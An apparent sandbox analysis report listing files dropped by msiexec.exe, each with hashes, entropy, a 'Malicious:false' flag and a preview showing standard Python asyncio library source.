                                                                                                                                Preview:import collections..import subprocess..import warnings....from . import protocols..from . import transports..from .log import logger......class BaseSubprocessTransport(transports.SubprocessTransport):.... def __init__(self, loop, protocol, args, shell,.. stdin, stdout, stderr, bufsize,.. waiter=None, extra=None, **kwargs):.. super().__init__(extra).. self._closed = False.. self._protocol = protocol.. self._loop = loop.. self._proc = None.. self._pid = None.. self._returncode = None.. self._exit_waiters = [].. self._pending_calls = collections.deque().. self._pipes = {}.. self._finished = False.... if stdin == subprocess.PIPE:.. self._pipes[0] = None.. if stdout == subprocess.PIPE:.. self._pipes[1] = None.. if stderr == subprocess.PIPE:.. self._pipes[2] = None.... # Create the child process: set the _proc attribute..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2736
                                                                                                                                Entropy (8bit):4.389117181651596
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MDlb5wrzhhBDgNuheP0PxxbycJw2O+wJouDpi4w8L2WvK7:MDl9kzTdg4gPw9ycJw2luD3w8L2yw
                                                                                                                                MD5:01752D1C01365EF997A988117465F1BE
                                                                                                                                SHA1:52EDAC2717DE1C5DE8B6E06C2355B5E01030443E
                                                                                                                                SHA-256:666CD17FBD8F88D2E65E15DAE32546AD858F4B0C28008D29BB5FEACEE75DE956
                                                                                                                                SHA-512:E8A1DF06149C82F7EFC54CB967D3981FC69ECBB57B33A66B976E545AE721F63EE2A2EE3A20988FC5C9F26FC04309B385D86027223BA0653572991EF284E5D395
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:import linecache..import reprlib..import traceback....from . import base_futures..from . import coroutines......def _task_repr_info(task):.. info = base_futures._future_repr_info(task).... if task.cancelling() and not task.done():.. # replace status.. info[0] = 'cancelling'.... info.insert(1, 'name=%r' % task.get_name()).... coro = coroutines._format_coroutine(task._coro).. info.insert(2, f'coro=<{coro}>').... if task._fut_waiter is not None:.. info.insert(3, f'wait_for={task._fut_waiter!r}').. return info......@reprlib.recursive_repr()..def _task_repr(task):.. info = ' '.join(_task_repr_info(task)).. return f'<{task.__class__.__name__} {info}>'......def _task_get_stack(task, limit):.. frames = [].. if hasattr(task._coro, 'cr_frame'):.. # case 1: 'async def' coroutines.. f = task._coro.cr_frame.. elif hasattr(task._coro, 'gi_frame'):.. # case 2: legacy coroutines.. f = task._coro.gi_frame.. elif has
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1146
                                                                                                                                Entropy (8bit):5.268755765497679
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:yD1CxjkkazhtNRHQVTLHhAWyVUqb1j+M2zV730JGvHApb/f:yJXhtD6hAWY7RCM4T0JGvHKf
                                                                                                                                MD5:57619284A2FF30EDA10BA9B8FC301928
                                                                                                                                SHA1:EDF902CC768972878289EC8BCA1D39EF3F813337
                                                                                                                                SHA-256:B560D3D7D6B60360FAA6DE80AC7340DB0654C107CF422346BEF3DA35A807BE93
                                                                                                                                SHA-512:3A81E529B55BB85490DD90EAA36F5CC1F726330E1752025EF15A83522E0FA4CD95BC6DD83D0CC856EFF0D866170B03878F47B4A1820589B3B7D9BC05A6C5FC65
                                                                                                                                Malicious:false
                                                                                                                                Preview:import enum....# After the connection is lost, log warnings after this many write()s...LOG_THRESHOLD_FOR_CONNLOST_WRITES = 5....# Seconds to wait before retrying accept()...ACCEPT_RETRY_DELAY = 1....# Number of stack entries to capture in debug mode...# The larger the number, the slower the operation in debug mode..# (see extract_stack() in format_helpers.py)...DEBUG_STACK_DEPTH = 10....# Number of seconds to wait for SSL handshake to complete..# The default timeout matches that of Nginx...SSL_HANDSHAKE_TIMEOUT = 60.0....# Number of seconds to wait for SSL shutdown to complete..# The default timeout mimics lingering_time..SSL_SHUTDOWN_TIMEOUT = 30.0....# Used in sendfile fallback code. We use fallback for platforms..# that don't support sendfile, or for TLS connections...SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 256....FLOW_CONTROL_HIGH_WATER_SSL_READ = 256 # KiB..FLOW_CONTROL_HIGH_WATER_SSL_WRITE = 512 # KiB....# The enum should be here to break circular dependencies between..# ba
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3511
                                                                                                                                Entropy (8bit):4.544109277860668
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:I+pQMzMBTJpOqy6fpZ6c7XFNry/ORKsoSSS35prVq/sP0O4H2aFEhU:FpQMzmTJpOl6RZ6F/gKsgDspiEhU
                                                                                                                                MD5:9AB779C5674E3623407E9D455A55AAA7
                                                                                                                                SHA1:77B61D5BAFB4E4DF73F143E5D6B7D338F5B0E80B
                                                                                                                                SHA-256:4E6024693C2BF7501E22C671189C5C58C0E460E191A623752A04705837C59CCA
                                                                                                                                SHA-512:9ED47A627053B1F623F04DA96C7718EB16006B0E53F958713C287CE2457B521F0F20D098667C71DEBF5D6D466154477003A6057E906F0DC96453F5992F41A9F1
                                                                                                                                Malicious:false
                                                                                                                                Preview:__all__ = 'iscoroutinefunction', 'iscoroutine'....import collections.abc..import inspect..import os..import sys..import traceback..import types......def _is_debug_mode():.. # See: https://docs.python.org/3/library/asyncio-dev.html#asyncio-debug-mode... return sys.flags.dev_mode or (not sys.flags.ignore_environment and.. bool(os.environ.get('PYTHONASYNCIODEBUG')))......# A marker for iscoroutinefunction..._is_coroutine = object()......def iscoroutinefunction(func):.. """Return True if func is a decorated coroutine function.""".. return (inspect.iscoroutinefunction(func) or.. getattr(func, '_is_coroutine', None) is _is_coroutine)......# Prioritize native coroutine check to speed-up..# asyncio.iscoroutine..._COROUTINE_TYPES = (types.CoroutineType, types.GeneratorType,.. collections.abc.Coroutine).._iscoroutine_typecache = set()......def iscoroutine(obj):.. """Return True if obj is a coroutine object.""".. if
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):29142
                                                                                                                                Entropy (8bit):4.5016028409212865
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:/6h8+ImJcD+fTXApG34ZhB5H++WWzPIAeCv:/6DcDwNoj++W2IAeCv
                                                                                                                                MD5:E92ACE54545230913CBE25A33F0CDEFA
                                                                                                                                SHA1:F8389E8E9928C108DAED51689BBEFB9205B57240
                                                                                                                                SHA-256:0C509EE71A042DC64D131F60FB267567B006A1A321740168EE6A103B665F7270
                                                                                                                                SHA-512:DB4B33BBFDB2662B63CFC2370DF1429619610F2A22786074AD46AA866BB5D390F60988780806CB8102E4EB6DF15BA38235C0D9ADAF7DCCCBC12E6E7CDDB28C63
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:"""Event loop and event loop policy."""....__all__ = (.. 'AbstractEventLoopPolicy',.. 'AbstractEventLoop', 'AbstractServer',.. 'Handle', 'TimerHandle',.. 'get_event_loop_policy', 'set_event_loop_policy',.. 'get_event_loop', 'set_event_loop', 'new_event_loop',.. 'get_child_watcher', 'set_child_watcher',.. '_set_running_loop', 'get_running_loop',.. '_get_running_loop',..)....import contextvars..import os..import socket..import subprocess..import sys..import threading....from . import format_helpers......class Handle:.. """Object returned by callback registration methods.""".... __slots__ = ('_callback', '_args', '_cancelled', '_loop',.. '_source_traceback', '_repr', '__weakref__',.. '_context').... def __init__(self, callback, args, loop, context=None):.. if context is None:.. context = contextvars.copy_context().. self._context = context.. self._loop = loop.. self._callback = callback
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1814
                                                                                                                                Entropy (8bit):4.664597808201475
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:Ad3QZbzX+MkvODzN3Z1zULxID+XvsaAWl2iyjDzPfgEBF6R9TaAs3hxER:iAJrzOMXzULxy+/sa/l2nzP4EMaBhxER
                                                                                                                                MD5:23C13351D6533C00C8E7707467D75E8A
                                                                                                                                SHA1:DEBE33F3B0AD9A330B90B2271E737646839814BE
                                                                                                                                SHA-256:A49AA2489262C47EE91528550EF464F1139E873DD5F1A3F18C3C099A0145E195
                                                                                                                                SHA-512:4D7AA609DCEFF0879B42B02C5985A550E85AD8B78AA33C0A3744B2DEC303BFAB7BD6D27662BC1B816E346E49B9466D6913F93B7D2ED10165C83AC261DEECC31A
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:"""asyncio exceptions."""......__all__ = ('BrokenBarrierError',.. 'CancelledError', 'InvalidStateError', 'TimeoutError',.. 'IncompleteReadError', 'LimitOverrunError',.. 'SendfileNotAvailableError')......class CancelledError(BaseException):.. """The Future or Task was cancelled."""......TimeoutError = TimeoutError # make local alias for the standard exception......class InvalidStateError(Exception):.. """The operation is not allowed in this state."""......class SendfileNotAvailableError(RuntimeError):.. """Sendfile syscall is not available..... Raised if OS does not support sendfile syscall for given socket or.. file type... """......class IncompleteReadError(EOFError):.. """.. Incomplete read error. Attributes:.... - partial: read bytes string before the end of stream was reached.. - expected: total number of expected bytes (or None if unknown).. """.. def __init__(self, partial, expected):.. r_expected = 'undefi
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2480
                                                                                                                                Entropy (8bit):4.6056367555974065
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:g863N4N9017WBmO9uMxP6U8QtUUIKOxYJCd67PiJQUhAs42eDv4mQ0L0j:g863NC9IiBmKxiUlWVKPJCs7oQUhANLi
                                                                                                                                MD5:64D0BFEF9B45C0EA83D954360F021869
                                                                                                                                SHA1:1BD55E0614613C37EADBD77188962F3BD5F28E30
                                                                                                                                SHA-256:657449627E8706CDC28A575DF9E975058E787FA2CC6A70B5DA7F9EB39D371DCB
                                                                                                                                SHA-512:23583958AAFD449B0B9991A0CFE569092D22684464F4DB3400C8E56B22CE127C0E73E94D59C976ECC40A70F2FE850164DF7AAB1A147629AF45BC7145B1C6BE9D
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:import functools..import inspect..import reprlib..import sys..import traceback....from . import constants......def _get_function_source(func):.. func = inspect.unwrap(func).. if inspect.isfunction(func):.. code = func.__code__.. return (code.co_filename, code.co_firstlineno).. if isinstance(func, functools.partial):.. return _get_function_source(func.func).. if isinstance(func, functools.partialmethod):.. return _get_function_source(func.func).. return None......def _format_callback_source(func, args):.. func_repr = _format_callback(func, args, None).. source = _get_function_source(func).. if source:.. func_repr += f' at {source[0]}:{source[1]}'.. return func_repr......def _format_args_and_kwargs(args, kwargs):.. """Format function arguments and keyword arguments..... Special case for a single parameter: ('hello',) is formatted as ('hello')... """.. # use reprlib to limit the length of the output.. items = [].
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):14577
                                                                                                                                Entropy (8bit):4.476875790395743
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:RH8T77Dp/ndJtDT7umUctWcOXOK4Uf6YRFTR/iNxzLdefQ9c0k+:FwN/ndJtxZtWcy4k5E/g2D1
                                                                                                                                MD5:8FF1B21F41454088843DD47584D3664F
                                                                                                                                SHA1:C8D35E3E70452C2E64F4C8E039E68BAB1695DCE2
                                                                                                                                SHA-256:AA2C83BB652BD0A01BC3109BD749F997DD9B74527971D5409F138E0654A5717D
                                                                                                                                SHA-512:08CAFDC18B4AB3CFC87EC1E40F3F033AE2F0CC36BFF9E672EF3451E03CDE33DF31B1E4B21DCC92F29C0D177FD2C85A6A5927DF52EE93D7C16C98314474013C0F
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:"""A Future class similar to the one in PEP 3148."""....__all__ = (.. 'Future', 'wrap_future', 'isfuture',..)....import concurrent.futures..import contextvars..import logging..import sys..from types import GenericAlias....from . import base_futures..from . import events..from . import exceptions..from . import format_helpers......isfuture = base_futures.isfuture......_PENDING = base_futures._PENDING.._CANCELLED = base_futures._CANCELLED.._FINISHED = base_futures._FINISHED......STACK_DEBUG = logging.DEBUG - 1 # heavy-duty debugging......class Future:.. """This class is *almost* compatible with concurrent.futures.Future..... Differences:.... - This class is not thread-safe..... - result() and exception() do not take a timeout argument and.. raise an exception when the future isn't done yet..... - Callbacks registered with add_done_callback() are always called.. via the event loop's call_soon()..... - This class is not compatible with the wait() and as_comp
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):19601
                                                                                                                                Entropy (8bit):4.377462625880585
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:j89yYtua1IhkzLJInU/iI7xyV+Wea/k7mt4YeJV8PxbLosoqL/Nl/1BbW5ZxZHZn:j89SViBVIoui5b2sC/my+nJvlWJEjgi
                                                                                                                                MD5:94DBDE38B8AFB11B316E16D1D2E3A15F
                                                                                                                                SHA1:FC8D86CCB4C3E062DA5506C2DB54AA12789AA1EE
                                                                                                                                SHA-256:D881EB6B28F8DB4B53F1AA17705FB6B2ED5617CA8784CE3F101E8BF3A8EC05E8
                                                                                                                                SHA-512:0ADE4456239385FCDC8E476590F4E041EAC7E69993545CAE12296E6D74412F4916BF1CD52DE1292CE06FF03718418361D3092BA6B45363C641AED2E82774EA56
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:"""Synchronization primitives."""....__all__ = ('Lock', 'Event', 'Condition', 'Semaphore',.. 'BoundedSemaphore', 'Barrier')....import collections..import enum....from . import exceptions..from . import mixins..from . import tasks....class _ContextManagerMixin:.. async def __aenter__(self):.. await self.acquire().. # We have no use for the "as ..." clause in the with.. # statement for locks... return None.... async def __aexit__(self, exc_type, exc, tb):.. self.release()......class Lock(_ContextManagerMixin, mixins._LoopBoundMixin):.. """Primitive lock objects..... A primitive lock is a synchronization primitive that is not owned.. by a particular coroutine when locked. A primitive lock is in one.. of two states, 'locked' or 'unlocked'..... It is created in the unlocked state. It has two basic methods,.. acquire() and release(). When the state is unlocked, acquire().. changes the state to locked and returns imme
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):131
                                                                                                                                Entropy (8bit):4.37276371888401
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:W5DQIMeHnoHIgXAgCrovYSNAFWAX+k++SoRKt1zC2QK466AGB:8QIbnoHXe+bPAukNSoRKtQW6Au
                                                                                                                                MD5:07687A8E3B30B3B320A3B3164812E3B1
                                                                                                                                SHA1:04A117C1275B17E12EC9527F49CA74399F9FFB28
                                                                                                                                SHA-256:72433D0D5A4205B74EF4FF95CD3E1C8D98960A58371E5546698A3A38F231058C
                                                                                                                                SHA-512:E2C8DE755A6281245B0A25BA20F4956EBDBB83AD375DEC62A93310C7D5F1BF12B10A7467807272B7323EB5D0C9CF3771421100B588A78945EEB972D768ED52FA
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:"""Logging configuration."""....import logging......# Name the logger after the package...logger = logging.getLogger(__package__)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):502
                                                                                                                                Entropy (8bit):4.264038214993239
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:2Ajxj4XvQtLTFL6Niuh2AakLv1G/HtpNDeidJKwQMTJy9MBXcAKKPksQBd8clRYR:20t1eh0DqvkX9KRfuPLDclRYR
                                                                                                                                MD5:592AD5057035FBE84AF5222A68FD2D7E
                                                                                                                                SHA1:C7FCBB8D67F25C9B9C46639EC1D0B78A2DE8B102
                                                                                                                                SHA-256:F5055BBC8622C99F91EF58024D4655209C904AB43F11498ADFB6218C127F9946
                                                                                                                                SHA-512:341D4C1B301632B51DD0F8B10F298745FC75994ABCC8C75F962C96BC155A4302A60F79998FDF2F927705E3EA060FEA6686151DF9094CC72025D5A4D2692A3599
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:"""Event loop mixins."""....import threading..from . import events...._global_lock = threading.Lock()......class _LoopBoundMixin:.. _loop = None.... def _get_loop(self):.. loop = events._get_running_loop().... if self._loop is None:.. with _global_lock:.. if self._loop is None:.. self._loop = loop.. if loop is not self._loop:.. raise RuntimeError(f'{self!r} is bound to a different event loop').. return loop..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):33968
                                                                                                                                Entropy (8bit):4.237305814009931
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:HTTnLvasHTpbMaZrfo2T/qnmaT3sqHBBtKyR:HppNfo8aT3sI1R
                                                                                                                                MD5:112DF13328C3FEB3EE238D4790DF4845
                                                                                                                                SHA1:098ED8120A3E97E43AB6620B41E899FCEBCD33A2
                                                                                                                                SHA-256:33B0FE52E19D717655F7D989B61A34ED80124F2F75DF33D1925B1AFB815A5C43
                                                                                                                                SHA-512:BCB4D84D28F43D9FB73F6239B15F2DA99D3848439F59A5349F9F911314BB94E8A6E1CD9EB572A152C9AD30F8639C029C6E6C7129C271547D8975164D1A0C55D7
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:"""Event loop using a proactor and related classes.....A proactor is a "notify-on-completion" multiplexer. Currently a..proactor is only implemented on Windows with IOCP..."""....__all__ = 'BaseProactorEventLoop',....import io..import os..import socket..import warnings..import signal..import threading..import collections....from . import base_events..from . import constants..from . import futures..from . import exceptions..from . import protocols..from . import sslproto..from . import transports..from . import trsock..from .log import logger......def _set_socket_extra(transport, sock):.. transport._extra['socket'] = trsock.TransportSocket(sock).... try:.. transport._extra['sockname'] = sock.getsockname().. except socket.error:.. if transport._loop.get_debug():.. logger.warning(.. "getsockname() failed on %r", sock, exc_info=True).... if 'peername' not in transport._extra:.. try:.. transport._extra['peername'] = sock
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7173
                                                                                                                                Entropy (8bit):4.508690129802189
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:GvIrPBEBCe7pXv83jwbtB2S1KnUB/MB2E505cFj:GvsqNVETwmSwU5hE5Z
                                                                                                                                MD5:AA57F822D953D524C717845CF040C7A8
                                                                                                                                SHA1:4A044088F18490FD5E29F132BA5EC1224C723BB9
                                                                                                                                SHA-256:66038B46A3D99B358166A061B9D5E9486CDDB9626D84C34F343640BB0D0EEC0A
                                                                                                                                SHA-512:A3FB50B69AA2523C17AE04B7562B42EBE2FB5F9EA5B23403EE9D92059C7B23727F30867FA561EC7E165D21B77C6F84F0024972D7335ADB09245198935985234B
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:"""Abstract Protocol base classes."""....__all__ = (.. 'BaseProtocol', 'Protocol', 'DatagramProtocol',.. 'SubprocessProtocol', 'BufferedProtocol',..)......class BaseProtocol:.. """Common base class for protocol interfaces..... Usually user implements protocols that derived from BaseProtocol.. like Protocol or ProcessProtocol..... The only case when BaseProtocol should be implemented directly is.. write-only transport like write pipe.. """.... __slots__ = ().... def connection_made(self, transport):.. """Called when a connection is made..... The argument is the transport representing the pipe connection... To receive data, wait for data_received() calls... When the connection is closed, connection_lost() is called... """.... def connection_lost(self, exc):.. """Called when the connection is lost or closed..... The argument is an exception object or None (the latter.. meaning a regular EOF is receive
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8218
                                                                                                                                Entropy (8bit):4.355264320169499
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:ZihNcb/YAsKXSWefpst8gcyTD6NKN2q2p9As/g2pbq8UXZbFLLBk3:ucbQfKX/6pXOXe+AL2ZJs
                                                                                                                                MD5:AA07F295C880EFCF11114F912DA15556
                                                                                                                                SHA1:15684100DC5BD09ED682FD4DD3F16FAB106F1500
                                                                                                                                SHA-256:77EA57D6C140F46FF1740FE0948894E43A77D6CFD3F03720DBDC7F5B72F03127
                                                                                                                                SHA-512:621441FAFE32F5C10461734286BA330FAD6A65473CE8CCC90080491EEB186DA99D28FDA8F48361A241388FFE061B0E545F8E8A32742295582A30FCDF97264348
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:__all__ = ('Queue', 'PriorityQueue', 'LifoQueue', 'QueueFull', 'QueueEmpty')....import collections..import heapq..from types import GenericAlias....from . import locks..from . import mixins......class QueueEmpty(Exception):.. """Raised when Queue.get_nowait() is called on an empty Queue.""".. pass......class QueueFull(Exception):.. """Raised when the Queue.put_nowait() method is called on a full Queue.""".. pass......class Queue(mixins._LoopBoundMixin):.. """A queue, useful for coordinating producer and consumer coroutines..... If maxsize is less than or equal to zero, the queue size is infinite. If it.. is an integer greater than 0, then "await put()" will block when the.. queue reaches maxsize, until an item is removed by get()..... Unlike the standard library Queue, you can reliably know this Queue's size.. with qsize(), since your single-threaded asyncio application won't be.. interrupted between calling qsize() and doing an operation on the Queue..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7053
                                                                                                                                Entropy (8bit):4.4313236937115414
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:W9aaus+1IZ8S3+eb1NHFh8p9w+p/Hya4ALexIhqN:qaAOIZaslKaCBeB
                                                                                                                                MD5:44E94A2A1D22895E767B2C7A24C9CDB9
                                                                                                                                SHA1:18944C35444ED78C17A8B7E3CE841A19F5993CA8
                                                                                                                                SHA-256:23B8E62D8918582DF38AE52EE7F970B091E6030EA6AEF7C6725A671649B41888
                                                                                                                                SHA-512:FAC27552FBE9DA20151993E67D10125AC25D5F8FC403491CB4685252A359E2BF46AAD079945716EB975904167829A6E0044300F43EE3C868C2A2A2A1FE981529
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:__all__ = ('Runner', 'run')....import contextvars..import enum..import functools..import threading..import signal..import sys..from . import coroutines..from . import events..from . import exceptions..from . import tasks......class _State(enum.Enum):.. CREATED = "created".. INITIALIZED = "initialized".. CLOSED = "closed"......class Runner:.. """A context manager that controls event loop life cycle..... The context manager always creates a new event loop,.. allows to run async functions inside it,.. and properly finalizes the loop at the context manager exit..... If debug is True, the event loop will be run in debug mode... If loop_factory is passed, it is used for new event loop creation..... asyncio.run(main(), debug=True).... is a shortcut for.... with asyncio.Runner(debug=True) as runner:.. runner.run(main()).... The run() method can be called multiple times within the runner's context..... This can be useful for interactive console (
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):46149
                                                                                                                                Entropy (8bit):4.289389454146726
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:QwG1ILr35d/lG+YKFHnKdmNO1LTEY8A3sz5+0O+2:QDC759N5q
                                                                                                                                MD5:8A0EC8F971F3CEDDD083A52B8001C411
                                                                                                                                SHA1:1FB3120CB659AF09DFD730675A830BFE9609646E
                                                                                                                                SHA-256:4F43357CA196D53BCB15C350F4A019DB2BCEF258F7124590D6E99D5201702BFB
                                                                                                                                SHA-512:E23146C7E7015348F898CE89EAE2B48E539E7BAB78AFDA37284EF9774854A9B84D7D28EE36764416437769C94FFF3446165E2580150DB0FD8D7035915F4CA72B
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                Preview:"""Event loop using a selector and related classes.....A selector is a "notify-when-ready" multiplexer. For a subclass which..also includes support for signal handling, see the unix_events sub-module..."""....__all__ = 'BaseSelectorEventLoop',....import collections..import errno..import functools..import selectors..import socket..import warnings..import weakref..try:.. import ssl..except ImportError: # pragma: no cover.. ssl = None....from . import base_events..from . import constants..from . import events..from . import futures..from . import protocols..from . import sslproto..from . import transports..from . import trsock..from .log import logger......def _test_selector_event(selector, fd, event):.. # Test if the selector is monitoring 'event' events.. # for the file descriptor 'fd'... try:.. key = selector.get_key(fd).. except KeyError:.. return False.. else:.. return bool(key.events & event)......class BaseSelectorEventLoop(base_events.Ba
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):32566
                                                                                                                                Entropy (8bit):4.438309110936202
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rb9lsu9k/6CTl0/J/AgUYi00QQUP/S/puJBhzX+Shn04o/dCMcc02F/8NNdbpap7:RhTf0UZ0VxoIz1bp0FxPKCVmsxg
                                                                                                                                MD5:03E3C6170D3D1E468AFFAC14CE12914A
                                                                                                                                SHA1:ED5FC49875704215E482C6E16BDEEB113B0C186B
                                                                                                                                SHA-256:15A9A7E933E75DA60034BD56E00C71A8A67D032DF63B634CABCA1C43E38A16F0
                                                                                                                                SHA-512:DE4E2E931F3BCF608CA8CDE007F21225DC0A0B4CD2533EB9785CBA211ACF3DE751B320C24F0C6E6FE49F7589B0BDB8D793FDB0702B0C1F59C2C2321DE704AC30
                                                                                                                                Malicious:false
                                                                                                                                Preview:import collections..import enum..import warnings..try:.. import ssl..except ImportError: # pragma: no cover.. ssl = None....from . import constants..from . import exceptions..from . import protocols..from . import transports..from .log import logger....if ssl is not None:.. SSLAgainErrors = (ssl.SSLWantReadError, ssl.SSLSyscallError)......class SSLProtocolState(enum.Enum):.. UNWRAPPED = "UNWRAPPED".. DO_HANDSHAKE = "DO_HANDSHAKE".. WRAPPED = "WRAPPED".. FLUSHING = "FLUSHING".. SHUTDOWN = "SHUTDOWN"......class AppProtocolState(enum.Enum):.. # This tracks the state of app protocol (https://git.io/fj59P):.. #.. # INIT -cm-> CON_MADE [-dr*->] [-er-> EOF?] -cl-> CON_LOST.. #.. # * cm: connection_made().. # * dr: data_received().. # * er: eof_received().. # * cl: connection_lost().... STATE_INIT = "STATE_INIT".. STATE_CON_MADE = "STATE_CON_MADE".. STATE_EOF = "STATE_EOF".. STATE_CON_LOST = "STATE_CON_LOST"......def _create_tran
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1234
                                                                                                                                Entropy (8bit):4.389215229914937
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:cangJHXiJ6sam35P1cBwj6ju/EPvT+C2cNbgsr0rBP/iZ7Z3fNPS8Wmie/R54:cangJHXiJ6sRp1cBwj6q/EHT+NtwVgek
                                                                                                                                MD5:668C92DC624FD380C1BE65538A79171C
                                                                                                                                SHA1:43E513137311DCA21F44C9A1336C8A2EEB6380BC
                                                                                                                                SHA-256:43DF980C9E5B904B043E68329AD2617EBF4A280CC7585479F59C3B9BCF7005CF
                                                                                                                                SHA-512:3374153F41E44453BB280C4997AE16D264B5698696978CA5CFE980BCB67871838AF770B6BA38BF3FD801CB291825C99565F24C35EE7210F7429DA76D4F4D41AB
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""The asyncio package, tracking PEP 3156."""....# flake8: noqa....import sys....# This relies on each of the submodules having an __all__ variable...from .base_events import *..from .coroutines import *..from .events import *..from .exceptions import *..from .futures import *..from .locks import *..from .protocols import *..from .runners import *..from .queues import *..from .streams import *..from .subprocess import *..from .tasks import *..from .taskgroups import *..from .timeouts import *..from .threads import *..from .transports import *....__all__ = (base_events.__all__ +.. coroutines.__all__ +.. events.__all__ +.. exceptions.__all__ +.. futures.__all__ +.. locks.__all__ +.. protocols.__all__ +.. runners.__all__ +.. queues.__all__ +.. streams.__all__ +.. subprocess.__all__ +.. tasks.__all__ +.. threads.__all__ +.. timeouts.__all__ +.. transpo
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):3468
